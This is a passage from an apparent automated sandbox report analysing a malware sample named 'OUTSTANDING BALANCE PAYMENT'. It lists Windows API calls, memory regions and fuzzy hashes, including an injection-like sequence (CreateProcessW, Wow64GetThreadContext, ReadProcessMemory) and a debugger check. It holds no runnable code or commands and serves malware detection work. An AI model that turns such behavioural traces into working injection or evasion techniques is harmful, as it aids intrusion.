                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: b843952d22f000411bc1f6393dbbae0d1da61441d08a7f1731caff0a14539edf
                                                          • Instruction ID: 264da0527cfde8a5a4c9fdbbe3589eea6181a2c1b29a8e7b9cf231222e7d9735
                                                          • Opcode Fuzzy Hash: b843952d22f000411bc1f6393dbbae0d1da61441d08a7f1731caff0a14539edf
                                                          • Instruction Fuzzy Hash: BE0196352852119BE6213B29DC56B2E23C8DB81F64B2500AAF5079B2B2DEF0DD41C760
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BAC385,?,?,?,?,?,00000004), ref: 00BAC6F2
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BAC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BAC708
                                                          • CloseHandle.KERNEL32(00000000,?,00BAC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BAC70F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: d6d1eb4f399f453bec5253d2977c2eb7be7e4c95c5589a9415089ff93b28aa22
                                                          • Instruction ID: d0a0dbf60bf112f7196d5462f138236bf7ec9c7ab4109f507ea110ed4eb96b00
                                                          • Opcode Fuzzy Hash: d6d1eb4f399f453bec5253d2977c2eb7be7e4c95c5589a9415089ff93b28aa22
                                                          • Instruction Fuzzy Hash: FAE08632140214BBDB211F54AC49FCA7F58EB05760F104110FB157E0E09BF269118799
                                                          APIs
                                                            • Part of subcall function 00B622A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B624F1), ref: 00B62303
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B625A1
                                                          • CoInitialize.OLE32(00000000), ref: 00B62618
                                                          • CloseHandle.KERNEL32(00000000), ref: 00BD503A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID:
                                                          • API String ID: 3815369404-0
                                                          • Opcode ID: ac359afbcc16b002bb25866086cb9e7cd6f9e4faa67ccca6c38df7c856411603
                                                          • Instruction ID: 57e17d07ad1459a81981414cf3ce876c4307ef127b0d35db33990a8e1cf60cf6
                                                          • Opcode Fuzzy Hash: ac359afbcc16b002bb25866086cb9e7cd6f9e4faa67ccca6c38df7c856411603
                                                          • Instruction Fuzzy Hash: B371CDB4921285CAC724EF6AA89079DBBE5FB7934039841BEE909C7F71CB344816CF15
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00B63A73
                                                            • Part of subcall function 00B81405: __lock.LIBCMT ref: 00B8140B
                                                            • Part of subcall function 00B63ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B63AF3
                                                            • Part of subcall function 00B63ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B63B08
                                                            • Part of subcall function 00B63D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B63AA3,?), ref: 00B63D45
                                                            • Part of subcall function 00B63D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00B63AA3,?), ref: 00B63D57
                                                            • Part of subcall function 00B63D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C21148,00C21130,?,?,?,?,00B63AA3,?), ref: 00B63DC8
                                                            • Part of subcall function 00B63D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00B63AA3,?), ref: 00B63E48
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B63AB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 924797094-0
                                                          • Opcode ID: ebfa560ec7c6c76de61798f81e786b88398fdd545142dece86b2d8040be41e32
                                                          • Instruction ID: 5f0c1cd768534391316d394131984c014a9d9287a84294377c2cd832c3df3afa
                                                          • Opcode Fuzzy Hash: ebfa560ec7c6c76de61798f81e786b88398fdd545142dece86b2d8040be41e32
                                                          • Instruction Fuzzy Hash: A31190715143419BC310EF69EC45A0EFBE8EBA4710F04895EF885872B1DB709A56CB92
                                                          APIs
                                                          • ___lock_fhandle.LIBCMT ref: 00B8EA29
                                                          • __close_nolock.LIBCMT ref: 00B8EA42
                                                            • Part of subcall function 00B87BDA: __getptd_noexit.LIBCMT ref: 00B87BDA
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                          • String ID:
                                                          • API String ID: 1046115767-0
                                                          • Opcode ID: 563abcf9d35c8b583e392384aefcc6383b655c91b388a047a4f6c6414aa8af22
                                                          • Instruction ID: adee96e13010f3d01a01fa2a87a3caa403f05b7e4deb056a3ac8b02158a2a6fc
                                                          • Opcode Fuzzy Hash: 563abcf9d35c8b583e392384aefcc6383b655c91b388a047a4f6c6414aa8af22
                                                          • Instruction Fuzzy Hash: 71117C728456109AD72ABFA8D8827587BE1AF82735F2643C0E4715F1F2CBB4C841DBA1
                                                          APIs
                                                            • Part of subcall function 00B8395C: __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                            • Part of subcall function 00B8395C: __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                            • Part of subcall function 00B8395C: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                          • std::exception::exception.LIBCMT ref: 00B7F51E
                                                          • __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                            • Part of subcall function 00B86805: RaiseException.KERNEL32(?,?,0000000E,00C16A30,?,?,?,00B7F538,0000000E,00C16A30,?,00000001), ref: 00B86856
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: bd62c361e579cb16a39ddc3d721f6adfc5356efebb2c5b21a1df361135b835cc
                                                          • Instruction ID: 862ffa3226dc664b7082b15761f19a9acc44a29ef9706f776fd6a4b5b39118c9
                                                          • Opcode Fuzzy Hash: bd62c361e579cb16a39ddc3d721f6adfc5356efebb2c5b21a1df361135b835cc
                                                          • Instruction Fuzzy Hash: 23F0AF3210421EA7DB04BFA9DC019EE77ECAF00354F6484B6FA1992191DBF0DB40D7AA
                                                          APIs
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          • __lock_file.LIBCMT ref: 00B83629
                                                            • Part of subcall function 00B84E1C: __lock.LIBCMT ref: 00B84E3F
                                                          • __fclose_nolock.LIBCMT ref: 00B83634
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: dd6ed2be3a065e0507c6c05020a4ccdd382219fbbdf6514e2c9936a82cca0ece
                                                          • Instruction ID: 2d80b2fdaf969992c17b0d58512435933d41134d19c3f7444d3030bbee99ec44
                                                          • Opcode Fuzzy Hash: dd6ed2be3a065e0507c6c05020a4ccdd382219fbbdf6514e2c9936a82cca0ece
                                                          • Instruction Fuzzy Hash: 6DF0B431805205AADB117F69C84276E7BE0AF41F35F2581D8E420AB2F1DB7C8A01DF55
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 016B5A83
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016B5B19
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016B5B3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                          • Instruction ID: 47729941147d53979bb9c978ed7d36c2e32718075ade49d3e9d55af46a80cc4f
                                                          • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                          • Instruction Fuzzy Hash: 6412BC24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                          APIs
                                                          • __flush.LIBCMT ref: 00B82A0B
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __flush__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 4101623367-0
                                                          • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                          • Instruction ID: aa7da5e9a2e4172fa9c762a24a48d2e58b040a45eb4d6cf3551d6d4ad64934c4
                                                          • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                          • Instruction Fuzzy Hash: 2D416271600706AFDB2CAFA9C8815AE7BE6EF44360F2485BDE855C7264EA70DD41CB44
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: a22d3ebcc466e5c846a63742b4dbe3114742af2e65b13d021cdcd2e5a99a4fd5
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 7C31A074A001059BD728DF58C490AA9FBE6FF49340B64C6E5E42ECB266DB31EDC1CB90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 311504f948e60661f7cfe742cfb2ef7d5244828ced01c7cbec73513925d907fb
                                                          • Instruction ID: 593e2246f28b5bd9ca006922565fc11404511a7ede39287eda53e687ef54b01c
                                                          • Opcode Fuzzy Hash: 311504f948e60661f7cfe742cfb2ef7d5244828ced01c7cbec73513925d907fb
                                                          • Instruction Fuzzy Hash: 7E414870508641CFDB24DF28C484B2ABBE1FF45304F1989ADE9AA5B362D372E845CF52
                                                          APIs
                                                            • Part of subcall function 00B64214: FreeLibrary.KERNEL32(00000000,?), ref: 00B64247
                                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B639FE,?,00000001), ref: 00B641DB
                                                            • Part of subcall function 00B64291: FreeLibrary.KERNEL32(00000000), ref: 00B642C4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load
                                                          • String ID:
                                                          • API String ID: 2391024519-0
                                                          • Opcode ID: f287fed5cc779ee25c13e9e86b0bfe16e1acb3c735e48359d37e5cd71c68e372
                                                          • Instruction ID: 617fbfe393d2e689acfd95a7606eff9d753bb90355f95fc3dd2eb85a17521fff
                                                          • Opcode Fuzzy Hash: f287fed5cc779ee25c13e9e86b0bfe16e1acb3c735e48359d37e5cd71c68e372
                                                          • Instruction Fuzzy Hash: AE110A31610705ABCB14BF70DC56F9E77E99F40B00F208469F596A71D1DF78DA009B60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 0209aecb57e5535db2250deba7e46025151f54fb59db0d5dab7b3fdbdd1a7f6c
                                                          • Instruction ID: bf6cb6f73d6462de6bc377ff071e410f80dc99fca89a679ded6367586e056016
                                                          • Opcode Fuzzy Hash: 0209aecb57e5535db2250deba7e46025151f54fb59db0d5dab7b3fdbdd1a7f6c
                                                          • Instruction Fuzzy Hash: E3210A70518701CFDB24DF68C444B2ABBE1FF84304F1589A9E9AA47361D771E845CF52
                                                          APIs
                                                          • ___lock_fhandle.LIBCMT ref: 00B8AFC0
                                                            • Part of subcall function 00B87BDA: __getptd_noexit.LIBCMT ref: 00B87BDA
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit$___lock_fhandle
                                                          • String ID:
                                                          • API String ID: 1144279405-0
                                                          • Opcode ID: 0912a425f47b47eddfebc044e172a030f72b09f710aa1ea074f61d549a20c968
                                                          • Instruction ID: 147134143d6a900e466ccad5795befe01f53beea2dd9ab71c54b641870366a60
                                                          • Opcode Fuzzy Hash: 0912a425f47b47eddfebc044e172a030f72b09f710aa1ea074f61d549a20c968
                                                          • Instruction Fuzzy Hash: E0116D728456009FD7127FB49842B5D7BE1AF41336F2642D0E4345B1F2DBB48941DBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                          • Instruction ID: 7e85002a20a855e39b4c285449fd577056d890293370cc8d126557772e20b416
                                                          • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                          • Instruction Fuzzy Hash: 79013671505109AECF05EFA4C8918EEBFF4EF21344F1080A6B565971A5EB309A49DF60
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00B82AED
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: bc45264666995bc420467f0c596508f2144717a576f66f74da597b39c57560bd
                                                          • Instruction ID: 546a3315dc3cfd79e5166f7681227a87a74065be5d0555a2a9eb73fc3a3184e0
                                                          • Opcode Fuzzy Hash: bc45264666995bc420467f0c596508f2144717a576f66f74da597b39c57560bd
                                                          • Instruction Fuzzy Hash: 88F06D31900605ABDF2ABF648C0679F3BE5BF00725F1584A5F8149B1B1DB78CA52EB51
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,00B639FE,?,00000001), ref: 00B64286
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: be1c07a95b3b7405024d9af5ceebbdc525055d4896bf6fb16e7ac0e6881116e6
                                                          • Instruction ID: 3e39effb51a73849e8da12e4b7496fa546652ccc9a0a6f1ba65549f21809fdf1
                                                          • Opcode Fuzzy Hash: be1c07a95b3b7405024d9af5ceebbdc525055d4896bf6fb16e7ac0e6881116e6
                                                          • Instruction Fuzzy Hash: 1BF015B1515B02CFCB349F64D8A0856BBE4FF143253348ABEF1D686620C7769844DF50
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B640C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID:
                                                          • API String ID: 82841172-0
                                                          • Opcode ID: 0c88a3b5f07e30303f068444f3df4d024c8662584345642ffac038440f3339c4
                                                          • Instruction ID: d8d7264ce119da7e18f34b60511ff26ad290074f360dc4cd7628c56e5ebfda1f
                                                          • Opcode Fuzzy Hash: 0c88a3b5f07e30303f068444f3df4d024c8662584345642ffac038440f3339c4
